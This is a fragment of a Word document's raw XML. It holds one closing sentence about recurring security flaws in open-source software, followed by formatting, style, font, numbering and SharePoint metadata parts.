        <w:t xml:space="preserve"> already</w:t>
      </w:r>
      <w:r w:rsidRPr="00176D5E">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">. This is an eye-opener for </w:t>
      </w:r>
      <w:r w:rsidR="00FA2D43">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t xml:space="preserve">any </w:t>
      </w:r>
      <w:r w:rsidRPr="00176D5E">
        <w:rPr>
          <w:lang w:eastAsia="ja-JP"/>
        </w:rPr>
        <w:t>open source because it is not the first time that security flaws of this nature have occurred.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00C4097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2EE8" w14:textId="77777777" w:rsidR="003A5E5B" w:rsidRDefault="003A5E5B" w:rsidP="003A5E5B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3CA02168" w14:textId="77777777" w:rsidR="003A5E5B" w:rsidRDefault="003A5E5B" w:rsidP="003A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NextW01-Bold">
    <w:altName w:val="Calibri"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="8000002F" w:usb1="0000000A" w:usb2="00000000" w:usb3="00000000" w:csb0="00000001" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Georgia">
    <w:panose1 w:val="02040502050405020303"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000287" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="DINNextLTPro-Light">
    <w:altName w:val="Calibri"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="A00000AF" w:usb1="5000205B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009B" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="DINNextLTPro-Regular">
    <w:altName w:val="Calibri"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>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B197" w14:textId="77777777" w:rsidR="003A5E5B" w:rsidRDefault="003A5E5B" w:rsidP="003A5E5B">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7ADEDE48" w14:textId="77777777" w:rsidR="003A5E5B" w:rsidRDefault="003A5E5B" w:rsidP="003A5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915F" w14:textId="77777777" w:rsidR="00AF1FB7" w:rsidRDefault="005C09CA">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0F523010" wp14:editId="5F0A99FF">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="page">
            <wp:align>right</wp:align>
          </wp:positionH>
          <wp:positionV relativeFrom="page">
            <wp:align>top</wp:align>
          </wp:positionV>
          <wp:extent cx="7540943" cy="1857375"/>
          <wp:effectExtent l="0" t="0" r="3175" b="0"/>
          <wp:wrapNone/>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0943" cy="1857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C6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F14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7DF6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="17BCE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238A6"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CCE047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885B52"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2C6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C2EB8"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E3D63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31870"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4A20F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4B3D1B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="75D84D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2BC211B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CCE047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5140481">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1813674373">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1112475121">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="610432517">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="2088337245">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="31853104">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="24252854">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1699617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E5B"/>
    <w:rsid w:val="00015769"/>
    <w:rsid w:val="00022A56"/>
    <w:rsid w:val="000240FA"/>
    <w:rsid w:val="00033BA2"/>
    <w:rsid w:val="00040AE8"/>
    <w:rsid w:val="00050379"/>
    <w:rsid w:val="0006235C"/>
    <w:rsid w:val="00070AFF"/>
    <w:rsid w:val="00085219"/>
    <w:rsid w:val="00086584"/>
    <w:rsid w:val="00096A8F"/>
    <w:rsid w:val="000974B4"/>
    <w:rsid w:val="000A2808"/>
    <w:rsid w:val="000A2DA1"/>
    <w:rsid w:val="000B3FE7"/>
    <w:rsid w:val="000C2C1F"/>
    <w:rsid w:val="000D7865"/>
    <w:rsid w:val="000E1115"/>
    <w:rsid w:val="000E2090"/>
    <w:rsid w:val="000E427A"/>
    <w:rsid w:val="000E4889"/>
    <w:rsid w:val="000F73B8"/>
    <w:rsid w:val="0010447E"/>
    <w:rsid w:val="00127FEC"/>
    <w:rsid w:val="00135E14"/>
    <w:rsid w:val="001560DA"/>
    <w:rsid w:val="0016216F"/>
    <w:rsid w:val="00162F93"/>
    <w:rsid w:val="00174779"/>
    <w:rsid w:val="00176D5E"/>
    <w:rsid w:val="0018367B"/>
    <w:rsid w:val="001B2179"/>
    <w:rsid w:val="001C7DD2"/>
    <w:rsid w:val="001F3449"/>
    <w:rsid w:val="002100EC"/>
    <w:rsid w:val="002134BE"/>
    <w:rsid w:val="00224B58"/>
    <w:rsid w:val="002310C3"/>
    <w:rsid w:val="00245441"/>
    <w:rsid w:val="00255548"/>
    <w:rsid w:val="00285A2F"/>
    <w:rsid w:val="00291EBE"/>
    <w:rsid w:val="00292238"/>
    <w:rsid w:val="002A6453"/>
    <w:rsid w:val="002E0050"/>
    <w:rsid w:val="00310311"/>
    <w:rsid w:val="00311881"/>
    <w:rsid w:val="00316669"/>
    <w:rsid w:val="00322E88"/>
    <w:rsid w:val="003249C5"/>
    <w:rsid w:val="00326684"/>
    <w:rsid w:val="00367045"/>
    <w:rsid w:val="003A468F"/>
    <w:rsid w:val="003A5E5B"/>
    <w:rsid w:val="003F2A38"/>
    <w:rsid w:val="0040634C"/>
    <w:rsid w:val="00411D3B"/>
    <w:rsid w:val="00460572"/>
    <w:rsid w:val="004870BB"/>
    <w:rsid w:val="004B1010"/>
    <w:rsid w:val="004B1B6F"/>
    <w:rsid w:val="004C29AB"/>
    <w:rsid w:val="004C3D42"/>
    <w:rsid w:val="004D5DE3"/>
    <w:rsid w:val="004E225D"/>
    <w:rsid w:val="004E3851"/>
    <w:rsid w:val="004F3F0A"/>
    <w:rsid w:val="004F559B"/>
    <w:rsid w:val="00520D63"/>
    <w:rsid w:val="005340B4"/>
    <w:rsid w:val="00541EDD"/>
    <w:rsid w:val="005463D6"/>
    <w:rsid w:val="0056093B"/>
    <w:rsid w:val="0056279E"/>
    <w:rsid w:val="00577BAE"/>
    <w:rsid w:val="00581C2D"/>
    <w:rsid w:val="00591783"/>
    <w:rsid w:val="005A03C3"/>
    <w:rsid w:val="005C09CA"/>
    <w:rsid w:val="005D735E"/>
    <w:rsid w:val="005E0103"/>
    <w:rsid w:val="005E0942"/>
    <w:rsid w:val="00611968"/>
    <w:rsid w:val="0061567D"/>
    <w:rsid w:val="00623017"/>
    <w:rsid w:val="00623148"/>
    <w:rsid w:val="00623A68"/>
    <w:rsid w:val="00646493"/>
    <w:rsid w:val="00651AAC"/>
    <w:rsid w:val="00656872"/>
    <w:rsid w:val="006679A3"/>
    <w:rsid w:val="0067686F"/>
    <w:rsid w:val="00680746"/>
    <w:rsid w:val="00692E01"/>
    <w:rsid w:val="006A00A6"/>
    <w:rsid w:val="006A1185"/>
    <w:rsid w:val="006B15E0"/>
    <w:rsid w:val="006B29DC"/>
    <w:rsid w:val="006B4CD3"/>
    <w:rsid w:val="006C0B9A"/>
    <w:rsid w:val="006F0FD5"/>
    <w:rsid w:val="006F17D0"/>
    <w:rsid w:val="00704394"/>
    <w:rsid w:val="00727ADF"/>
    <w:rsid w:val="00731BB2"/>
    <w:rsid w:val="00746598"/>
    <w:rsid w:val="00756571"/>
    <w:rsid w:val="0076254D"/>
    <w:rsid w:val="00773B98"/>
    <w:rsid w:val="00774819"/>
    <w:rsid w:val="00784C0E"/>
    <w:rsid w:val="0079087E"/>
    <w:rsid w:val="007A2C78"/>
    <w:rsid w:val="007A5C31"/>
    <w:rsid w:val="007D59ED"/>
    <w:rsid w:val="00801AF8"/>
    <w:rsid w:val="008079FA"/>
    <w:rsid w:val="008171AA"/>
    <w:rsid w:val="00837650"/>
    <w:rsid w:val="00837772"/>
    <w:rsid w:val="00842F32"/>
    <w:rsid w:val="00873F63"/>
    <w:rsid w:val="008854C4"/>
    <w:rsid w:val="008B5468"/>
    <w:rsid w:val="008D4CDA"/>
    <w:rsid w:val="008F0230"/>
    <w:rsid w:val="008F0BA7"/>
    <w:rsid w:val="00912C43"/>
    <w:rsid w:val="00924602"/>
    <w:rsid w:val="00937A3C"/>
    <w:rsid w:val="0094406E"/>
    <w:rsid w:val="00946BF5"/>
    <w:rsid w:val="00946D01"/>
    <w:rsid w:val="00947E57"/>
    <w:rsid w:val="009720AC"/>
    <w:rsid w:val="00980D50"/>
    <w:rsid w:val="0099629D"/>
    <w:rsid w:val="009A239E"/>
    <w:rsid w:val="009A27C8"/>
    <w:rsid w:val="009A2BB8"/>
    <w:rsid w:val="009B1DCF"/>
    <w:rsid w:val="009C21A6"/>
    <w:rsid w:val="009E01EC"/>
    <w:rsid w:val="009E482D"/>
    <w:rsid w:val="009F16F0"/>
    <w:rsid w:val="009F535D"/>
    <w:rsid w:val="00A1356F"/>
    <w:rsid w:val="00A147E3"/>
    <w:rsid w:val="00A317F3"/>
    <w:rsid w:val="00A33342"/>
    <w:rsid w:val="00A62414"/>
    <w:rsid w:val="00A62B79"/>
    <w:rsid w:val="00A811AA"/>
    <w:rsid w:val="00A8384B"/>
    <w:rsid w:val="00AB4950"/>
    <w:rsid w:val="00AF5324"/>
    <w:rsid w:val="00AF53B1"/>
    <w:rsid w:val="00B001B9"/>
    <w:rsid w:val="00B21C4D"/>
    <w:rsid w:val="00B22B73"/>
    <w:rsid w:val="00B44773"/>
    <w:rsid w:val="00B55633"/>
    <w:rsid w:val="00B67B3A"/>
    <w:rsid w:val="00B74963"/>
    <w:rsid w:val="00BB1850"/>
    <w:rsid w:val="00BB5E17"/>
    <w:rsid w:val="00BB619B"/>
    <w:rsid w:val="00BB7A40"/>
    <w:rsid w:val="00BD23F2"/>
    <w:rsid w:val="00BE1E4B"/>
    <w:rsid w:val="00BE3A11"/>
    <w:rsid w:val="00BE7177"/>
    <w:rsid w:val="00BE7ACA"/>
    <w:rsid w:val="00BF269A"/>
    <w:rsid w:val="00C142F1"/>
    <w:rsid w:val="00C162FE"/>
    <w:rsid w:val="00C20852"/>
    <w:rsid w:val="00C24AEF"/>
    <w:rsid w:val="00C26F28"/>
    <w:rsid w:val="00C31F28"/>
    <w:rsid w:val="00C4097E"/>
    <w:rsid w:val="00C43B4D"/>
    <w:rsid w:val="00C61177"/>
    <w:rsid w:val="00C65F31"/>
    <w:rsid w:val="00CA6C22"/>
    <w:rsid w:val="00CB0D11"/>
    <w:rsid w:val="00CB46CB"/>
    <w:rsid w:val="00CB72B4"/>
    <w:rsid w:val="00CC022B"/>
    <w:rsid w:val="00CC34E0"/>
    <w:rsid w:val="00CE57CD"/>
    <w:rsid w:val="00CE7C0B"/>
    <w:rsid w:val="00CF0A1A"/>
    <w:rsid w:val="00CF2119"/>
    <w:rsid w:val="00CF59D5"/>
    <w:rsid w:val="00CF720B"/>
    <w:rsid w:val="00D07C93"/>
    <w:rsid w:val="00D75FDB"/>
    <w:rsid w:val="00D76707"/>
    <w:rsid w:val="00DA39C1"/>
    <w:rsid w:val="00DA3A8F"/>
    <w:rsid w:val="00DA626E"/>
    <w:rsid w:val="00DB1AA7"/>
    <w:rsid w:val="00DC1861"/>
    <w:rsid w:val="00DC7853"/>
    <w:rsid w:val="00DE0C99"/>
    <w:rsid w:val="00DE4104"/>
    <w:rsid w:val="00E0624E"/>
    <w:rsid w:val="00E12455"/>
    <w:rsid w:val="00E218C9"/>
    <w:rsid w:val="00E25682"/>
    <w:rsid w:val="00E53334"/>
    <w:rsid w:val="00E62E4D"/>
    <w:rsid w:val="00E71DB8"/>
    <w:rsid w:val="00E81D25"/>
    <w:rsid w:val="00E82A30"/>
    <w:rsid w:val="00E92477"/>
    <w:rsid w:val="00E96D42"/>
    <w:rsid w:val="00EA593E"/>
    <w:rsid w:val="00EB1293"/>
    <w:rsid w:val="00EB769A"/>
    <w:rsid w:val="00EC4A29"/>
    <w:rsid w:val="00ED61E6"/>
    <w:rsid w:val="00EE6618"/>
    <w:rsid w:val="00EF3156"/>
    <w:rsid w:val="00EF55CA"/>
    <w:rsid w:val="00F10AFB"/>
    <w:rsid w:val="00F153FD"/>
    <w:rsid w:val="00F23B08"/>
    <w:rsid w:val="00F26F59"/>
    <w:rsid w:val="00F508D9"/>
    <w:rsid w:val="00F52CE0"/>
    <w:rsid w:val="00F55DB5"/>
    <w:rsid w:val="00F73BD1"/>
    <w:rsid w:val="00F84CE9"/>
    <w:rsid w:val="00FA2D43"/>
    <w:rsid w:val="00FB337C"/>
    <w:rsid w:val="00FB4548"/>
    <w:rsid w:val="00FC0417"/>
    <w:rsid w:val="00FC09ED"/>
    <w:rsid w:val="00FC3988"/>
    <w:rsid w:val="00FD0A67"/>
    <w:rsid w:val="00FD6227"/>
    <w:rsid w:val="00FE5250"/>
    <w:rsid w:val="00FE7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9F6B4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{65710B49-4A24-4CFF-81AC-294E30A0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5B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="003A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5E5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5E5B"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003A5E5B"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="003A5E5B"/>
    <w:pPr>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003A5E5B"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003A5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5B"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003A5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5B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="NAMEORANGE">
    <w:name w:val="NAME ORANGE"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="003A5E5B"/>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:color w:val="E76A1D"/>
      <w:sz w:val="78"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="GridTable4-Accent6">
    <w:name w:val="Grid Table 4 Accent 6"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="003A5E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3A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5E5B"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="keyword">
    <w:name w:val="keyword"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="006B15E0"/>
  </w:style>
  <w:style w:type="character" w:styleId="HTMLCode">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00CF5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7D9A4ACB2C84FA0EA8FEDFCA473B9" ma:contentTypeVersion="11" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="2dd487f3a39e41dad5cdc61248b4163a">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns3="fec97b85-3fc8-46c2-8926-986b1bbd36bb" xmlns:ns4="09bf8b15-c340-4e5a-9412-21cbedf60505" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="7bcd665123d91644dd7f8a2a7fccdf4a" ns3:_="" ns4:_="">
    <xsd:import namespace="fec97b85-3fc8-46c2-8926-986b1bbd36bb"/>
    <xsd:import namespace="09bf8b15-c340-4e5a-9412-21cbedf605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97b85-3fc8-46c2-8926-986b1bbd36b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bf8b15-c340-4e5a-9412-21cbedf605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9bf8b15-c340-4e5a-9412-21cbedf60505" xsi:nil="true"/>
  </documentManagement>
</p:properties>
</file>

<file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{BDE62CF0-F39A-4C6D-BB70-A5F3D509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97b85-3fc8-46c2-8926-986b1bbd36bb"/>
    <ds:schemaRef ds:uri="09bf8b15-c340-4e5a-9412-21cbedf60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9E023-A609-4B54-83C3-15B14CC83AFB}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{80F8DAB3-523F-4B63-8468-A75B5C1153AD}">
  <ds:schemaRef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09bf8b15-c340-4e5a-9412-21cbedf60505"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/documentManagement/types"/>
    <ds:schemaRef ds:uri="fec97b85-3fc8-46c2-8926-986b1bbd36bb"/>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7</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Meeran Mohammed</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Meeran Mohammed</cp:lastModifiedBy>
  <cp:revision>260</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-02-01T11:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-02T09:52:00Z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0x01010044A7D9A4ACB2C84FA0EA8FEDFCA473B9</vt:lpwstr>
  </property>
</Properties>
</file>